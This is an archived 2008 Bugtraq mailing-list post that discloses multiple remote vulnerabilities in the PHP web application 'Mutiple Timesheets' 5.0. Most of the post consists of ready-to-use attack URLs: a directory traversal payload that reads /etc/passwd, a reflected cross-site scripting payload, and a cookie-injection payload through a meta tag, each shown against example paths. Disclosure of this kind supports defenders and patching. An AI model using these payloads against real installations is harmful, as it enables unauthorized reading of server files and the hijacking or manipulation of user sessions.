lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080317101946.10289.qmail@securityfocus.com>
Date: 17 Mar 2008 10:19:46 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: Mutiple Timesheets <= 5.0 - Multiple Remote Vulnerabilities

[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Mutiple Timesheets
[~] Download: http://riceball.com/drupal/files/mts-5.zip
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: Jose Luis Góngora Fernández | JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Good!

[+] Directory traversal:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[FILE]
[~] Example: http://localhost/apps/mts/mts/?tab=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[+] Cross Site Scripting:

[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/?tab=[XSS]
[~] Example: http://localhost/apps/mts/mts/?tab=>'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>

[+] Cookie Manipulation:

[~] Vuln File: index.php, clientinfo.php, invoices.php, smartlinks.php, todo.php
[~] Exploit: http://localhost/PATH/index.php?mode=edit&tab=[Cookie]
[~] Example: /apps/mts/mts/index.php?mode=edit&tab=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ